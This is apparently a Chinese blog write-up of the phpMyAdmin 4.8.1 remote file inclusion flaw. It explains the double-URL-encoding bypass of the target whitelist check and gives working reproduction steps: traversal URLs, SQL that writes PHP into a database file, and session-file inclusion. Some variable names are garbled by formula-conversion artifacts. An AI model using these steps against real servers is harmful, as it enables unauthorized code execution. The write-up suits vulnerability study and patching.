phpmyadmin 4.8.1 远程文件包含漏洞

一、漏洞详情

首先在index.php 50-67行代码

满足5个条件后就会include$_REQUEST[‘target’]的内容

$_REQUEST[‘target’]不为空
$_REQUEST[‘target’]是字符串
$_REQUEST[‘target’]不以index开头
${}_{R}EQUEST{[}^{\prime }targe{t}^{\prime }]不在$target_blacklist中
‘import.php’, ‘export.php’
Core::checkPageValidity($_REQUEST[‘target’])为真
代码在libraries\classes\Core.php 443-476行

$whitelist一开始未传参过来，所以会被赋值为self::$goto_whitelist`

如果$page在白名单中就会直接return true，但这里考虑到了可能带参数的情况，所以有了下面的判断

mb_strpos ( string $haystack , string $needle [, int $offset = 0 [, string $encoding = mb_internal_encoding() ]] ) : int
查找 string 在一个 string 中首次出现的位置。基于字符数执行一个多字节安全的 strpos() 操作。 第一个字符的位置是 0，第二个字符的位置是 1，以此类推。
${}_{p}age是取出$page问号前的东西，是考虑到target有参数的情况，只要$_page在白名单中就直接return true
但还考虑了url编码的情况，所以如果这步判断未成功，下一步又进行url解码

所以传入二次编码后的内容，会让checkPageValidity()这个函数返回true，但index中实际包含的内容却不是白名单中的文件
例如传入
?target=db_datadict.php%253f
由于服务器会自动解码一次，所以在checkPageValidity()中，$page的值一开始会是d{b}_{d}atadict.php但在index.php中$_REQUEST[‘target’]仍然是db_datadict.php%3f，而且会被include，通过目录穿越，就可造成任意文件包含

二、漏洞复现

1.任意文件包含

通过目录穿越包含任意文件
?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/Windows/DATE.ini

2.任意代码执行

包含数据库文件
先执行SQL语句查询一下数据库路径
show global variables like “%datadir%”;

3.向数据库写入php代码

CREATE DATABASE rce;
use rce;
CREATE TABLE rce(code varchar(100));
INSERT INTO rce(code) VALUES("<?php phpinfo(); ?>");

然后包含该数据库文件
http://127.0.0.1/phpMyAdmin4.8.1/index.php?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/phpStudy/PHPTutorial/MySQL/data/rce/rce.MYD

4.包函session文件

session路径的视环境而定
SELECT ‘<?php phpinfo()?>’;


然后访问http://127.0.0.1/phpMyAdmin4.8.1/index.php?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/phpStudy/PHPTutorial/tmp/tmp/sess_a5ao2g5pisd58uv17rqq5665fh

三、我的公众号

后续操作请持续关注哦！！！
了解更多请关注下列公众号：
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗